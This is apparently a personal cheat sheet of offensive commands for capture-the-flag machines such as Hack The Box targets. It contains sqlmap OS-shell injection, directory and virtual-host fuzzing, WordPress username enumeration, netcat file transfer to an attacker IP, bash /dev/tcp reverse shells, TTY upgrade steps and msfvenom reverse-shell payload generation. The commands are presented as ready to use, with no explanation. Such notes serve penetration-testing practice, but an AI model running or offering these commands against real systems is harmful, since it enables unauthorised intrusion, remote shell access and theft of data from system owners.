sqlmap  -v 3  -r  ../Desktop/CTF/HTB/vaccine/request2.txt --risk=3 --level=5 --smart --dbms=postgresql  --os-shell  --tamper=substring2leftright -p search


--
~/Downloads/maurosoria-dirsearch/dirsearch.py --url=http://gitbucket.seal.htb:8080/..keys/ -e php,sh,sql,html,cs,js --exclude-status=404 --cookie='JSESSIONID=node0BLAH'
# see  ~/Downloads/maurosoria-dirsearch/default.conf
____________________________________________________
# FFUF ???
ffuf -k -u https://seal.htb/FUZZ -w ../tomcat-fuzz-sorted.txt -t 200 -c
wfuzz -c -z file,/tmp/10usernames.txt -X POST -d  'user_login=FUZZ&redirect_to=&wp-submit=Get+New+Password' --hw=242  http://10.13.37.11/wp-login.php?action=lostpassword
wfuzz -c -w /u/s/words/blah/Usernames/xato-net-10-million-usernames-dup.txt -X POST -d 'user_login=FUZZ&redirect_to=&wp-submit=Get+New+Password' --hw=242 http://10.13.37.11/wp-login.php?action=lostpassword | tee wfuzz-log.txt
------------------------
#  VHSOT fuzz
gobuster vhost --append-domain --follow-redirect --random-agent --url http://crossfit.htb/ --wordlist  test2-subdomains.txt

# remote
nc -w 3 10.10.14.87 4445 < /tmp/linenum.txt
# local
nc -nlvp 4445 > linenum.txt
--------------------------------
# in local term
nc -nlv 10.10.14.87  4444
--------------------------------

bash -c 'bash -i >& /dev/tcp/192.168.8.221/4444 0>&1'___________________________________
bash -c 'bash -i >& /dev/tcp/10.10.16.66/4444 0>&1'

python -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")'
SHELL=/bin/bash script -q /dev/null
/usr/bin/script -qc /bin/bash /dev/null

___________________________________
export SHELL=bash
export TERM=xterm-256color

Ctrl-Z
###############
# In reverse shell
stty raw -echo
fg
################
# export TERM=xterm-256color
# stty rows 70 columns  145
___________________________________
___________________________________
# WINDOWS:
execute -f cmd.exe -i -H
whoami
____________________

msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.56.101 -e x86/shikata_ga_nai -b "\x00" -f py
msfvenom -p linux/x86/shell/reverse_tcp LPORT=443 LHOST=192.168.56.101 -e x86/shikata_ga_nai -b "\x00" -f py
msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x10\x20\x46' -f py
